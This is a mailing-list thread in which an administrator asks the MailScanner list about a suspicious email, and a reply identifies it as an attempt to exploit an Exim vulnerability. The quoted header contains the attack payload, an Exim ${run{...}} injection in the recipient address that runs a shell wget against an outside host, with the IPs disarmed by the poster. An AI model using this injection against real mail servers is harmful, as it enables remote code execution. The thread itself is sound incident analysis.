possible attack against MailScanner ?
Heino Backhaus
heino.backhaus at fink-computer.de
Mon Jul 15 11:30:32 UTC 2019
thanks for answering...
at now, i've got a main-question: As it seems, they tried to download
and execute some code, so i need to make shure if they did succeed,
cause if so, i need to shutdown MailScanner imidiately.
But as you stated this should only work with exim ...
The next question is: Where did the *Received:1-31* lines come from?
They're looking a bit strange to me.
Mit freundlichen Gruessen
H. Backhaus
Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: heino.backhaus at fink-computer.de
Web: www.fink-computer.de
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink
I was gratified to be able to answer promptly, and I did.
I said I didn't know.
Mark Twain
Am 15.07.2019 um 13:13 schrieb Martin Hepworth:
> Looks like an attempt at the Exim vulnerability exploitation rather
> than mailscanner
>
> On Mon, 15 Jul 2019 at 11:59, Heino Backhaus
> <heino.backhaus at fink-computer.de
> <mailto:heino.backhaus at fink-computer.de>> wrote:
>
> Hallo List,
>
> i need some help analysing the following email, i received last week.
>
> Mailwatch Mail-Metadata:
>
> Received: from sab.com <http://sab.com> (unknown [46.22.132.94])
> by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
> for
> <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*x22}}@mailscanner.mydomain.local
> <mailto:x22%7D%7D at mailscanner.mydomain.local>>; Thu, 11 Jul 2019
> 19:34:58 +0200 (CEST)
> *Received: 1**
> **Received: 2**
> **Received: 3**
> **Received: 4**
> **Received: 5**
> **Received: 6**
> **Received: 7**
> **Received: 8**
> **Received: 9**
> **Received: 10**
> **Received: 11**
> **Received: 12**
> **Received: 13**
> **Received: 14**
> **Received: 15**
> **Received: 16**
> **Received: 17**
> **Received: 18**
> **Received: 19**
> **Received: 20**
> **Received: 21**
> **Received: 22**
> **Received: 23**
> **Received: 24**
> **Received: 25**
> **Received: 26**
> **Received: 27**
> **Received: 28**
> **Received: 29**
> **Received: 30**
> **Received: 31*
>
>
>
> IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just
> in case...
> IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just
> in case...
>
> Versions:
> MailWatch Version: 1.2.9
> OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
> Postfix Version: 3.1.0
> MailScanner Version: 5.1.2
> ClamAV Version: 0.102.0-devel-20190715
> SpamAssassin Version: 3.4.2
> PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org
> <http://deb.sury.org>+1
> MySQL Version: 5.7.26-0ubuntu0.16.04.1
>
> Can you help me to bring some light in this dark...
>
> --
> Mit freundlichen Gruessen
>
> H. Backhaus
>
> Fink-Computer Systeme
> Heggrabenstr. 9, 35435 Wettenberg <https://www.google.com/maps/search/Heggrabenstr.+9,+35435+Wettenberg?entry=gmail&source=g>
> Email: heino.backhaus at fink-computer.de <mailto:heino.backhaus at fink-computer.de>
> Web: www.fink-computer.de <http://www.fink-computer.de>
> Fax: +49-641-98444638
> Fon: +49-641-98444640
> UST-ID: DE151040770
> HRB: 2143 Gießen
> GF: Fredi Fink
>
> I was gratified to be able to answer promptly, and I did.
> I said I didn't know.
> Mark Twain
>
>
> --
> Diese E-Mail wurde auf Viren und gefährliche Anhänge
> durch *MailScanner* <http://www.mailscanner.info/> untersucht und
> ist wahrscheinlich virenfrei.
>
>
> --
> MailScanner mailing list
> mailscanner at lists.mailscanner.info
> <mailto:mailscanner at lists.mailscanner.info>
> http://lists.mailscanner.info/mailman/listinfo/mailscanner
>
> --
> --
> Martin Hepworth, CISSP
> Oxford, UK
>
> --
> Diese E-Mail wurde auf Viren und gefährliche Anhänge
> durch *MailScanner* <http://www.mailscanner.info/> untersucht und ist
> wahrscheinlich virenfrei.
>
>
--
Diese Nachricht wurde auf Viren und andere gefährliche Inhalte untersucht
und ist - aktuelle Virenscanner vorausgesetzt - sauber.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.mailscanner.info/pipermail/mailscanner/attachments/20190715/18d3dec7/attachment.html>
More information about the MailScanner
mailing list